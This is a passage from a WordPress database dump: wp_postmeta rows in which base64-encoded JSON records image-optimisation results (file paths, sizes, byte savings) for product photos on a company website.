aWQiOjE4NTd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9lbGVjdHJpY2FsLWNvbnRhY3QtbHVicmljYW50LTItOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZWxlY3RyaWNhbC1jb250YWN0LWx1YnJpY2FudC0yLTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9lbGVjdHJpY2FsLWNvbnRhY3QtbHVicmljYW50LTItOTB4OTAuanBnIiwicmVkdWN0aW9uIjo0ODIsInRpbWUiOjE0ODM1NTMzNjIsImlkIjoxODU3fV0='); 
INSERT INTO `wp_postmeta` VALUES (29082, 1856, 'wpfc_optimisation_reduction', '26583'); 
INSERT INTO `wp_postmeta` VALUES (29083, 1856, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTM4LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTM4LmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTMzNjYsImlkIjoiMTg1NiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTM4LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTM4LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNTM4LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo5NTAsInRpbWUiOjE0ODM1NTMzNjksImlkIjoxODU2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTUzOC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTUzOC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTUzOC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MzI0MywidGltZSI6MTQ4MzU1MzM3MywiaWQiOjE4NTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTM4LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTM4LTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNTM4LTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyOTEzLCJ0aW1lIjoxNDgzNTUzMzc2LCJpZCI6MTg1Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzgtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTM4LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01MzgtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTM2NDEsInRpbWUiOjE0ODM1NTMzODAsImlkIjoxODU2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTUzOC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTUzOC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTUzOC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjM3LCJ0aW1lIjoxNDgzNTUzMzg0LCJpZCI6MTg1Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzgtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzgtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01MzgtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjU0MywidGltZSI6MTQ4MzU1MzM4OCwiaWQiOjE4NTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTM4LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTM4LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNTM4LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo2MTQsInRpbWUiOjE0ODM1NTMzOTEsImlkIjoxODU2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTUzOC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTUzOC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTUzOC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MjAwNywidGltZSI6MTQ4MzU1MzM5NCwiaWQiOjE4NTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzgtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzgtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01MzgtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjYxMywidGltZSI6MTQ4MzU1MzM5OCwiaWQiOjE4NTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzgtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzgtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01MzgtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEwMzIsInRpbWUiOjE0ODM1NTM0MDEsImlkIjoxODU2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTM4LTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTUzOC05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNTM4LTkweDkwLmpwZyIsInJlZHVjdGlvbiI6MzkwLCJ0aW1lIjoxNDgzNTUzNDA0LCJpZCI6MTg1Nn1d'); 
INSERT INTO `wp_postmeta` VALUES (29084, 1855, 'wpfc_optimisation_reduction', '25526'); 
INSERT INTO `wp_postmeta` VALUES (29085, 1855, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtOTA3LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtOTA3LmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTM0MDksImlkIjoiMTg1NSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtOTA3LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtOTA3LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtOTA3LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxMDMxLCJ0aW1lIjoxNDgzNTUzNDEyLCJpZCI6MTg1NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy05MDctODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy05MDctODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy05MDctODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjMwOTksInRpbWUiOjE0ODM1NTM0MTYsImlkIjoxODU1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTkwNy03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTkwNy03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTkwNy03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MjY2MywidGltZSI6MTQ4MzU1MzQxOSwiaWQiOjE4NTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtOTA3LTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTkwNy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtOTA3LTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEyMjA4LCJ0aW1lIjoxNDgzNTUzNDI0LCJpZCI6MTg1NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy05MDctMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy05MDctMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy05MDctMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjcxNCwidGltZSI6MTQ4MzU1MzQyNywiaWQiOjE4NTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtOTA3LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtOTA3LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtOTA3LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1NTYsInRpbWUiOjE0ODM1NTM0MzAsImlkIjoxODU1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTkwNy0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTkwNy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTkwNy0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6Njc2LCJ0aW1lIjoxNDgzNTUzNDMzLCJpZCI6MTg1NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy05MDctNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy05MDctNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy05MDctNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE4MzEsInRpbWUiOjE0ODM1NTM0MzgsImlkIjoxODU1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtOTA3LTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtOTA3LTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtOTA3LTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjoxMTEwLCJ0aW1lIjoxNDgzNTUzNDQxLCJpZCI6MTg1NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTkwNy00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTkwNy00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTkwNy00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MTI0MCwidGltZSI6MTQ4MzU1MzQ0NSwiaWQiOjE4NTV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy05MDctOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtOTA3LTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy05MDctOTB4OTAuanBnIiwicmVkdWN0aW9uIjozOTgsInRpbWUiOjE0ODM1NTM0NDgsImlkIjoxODU1fV0='); 
INSERT INTO `wp_postmeta` VALUES (29086, 1854, 'wpfc_optimisation_reduction', '20229'); 
INSERT INTO `wp_postmeta` VALUES (29087, 1854, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRzA4MzFCLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRzA4MzFCLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTM0NTIsImlkIjoiMTg1NCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRzA4MzFCLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRzA4MzFCLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRzA4MzFCLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo3MTksInRpbWUiOjE0ODM1NTM0NTYsImlkIjoxODU0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0cwODMxQi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0cwODMxQi04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0cwODMxQi04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MjQ2MywidGltZSI6MTQ4MzU1MzQ2MSwiaWQiOjE4NTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRzA4MzFCLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRzA4MzFCLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRzA4MzFCLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyMjA5LCJ0aW1lIjoxNDgzNTUzNDY1LCJpZCI6MTg1NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwM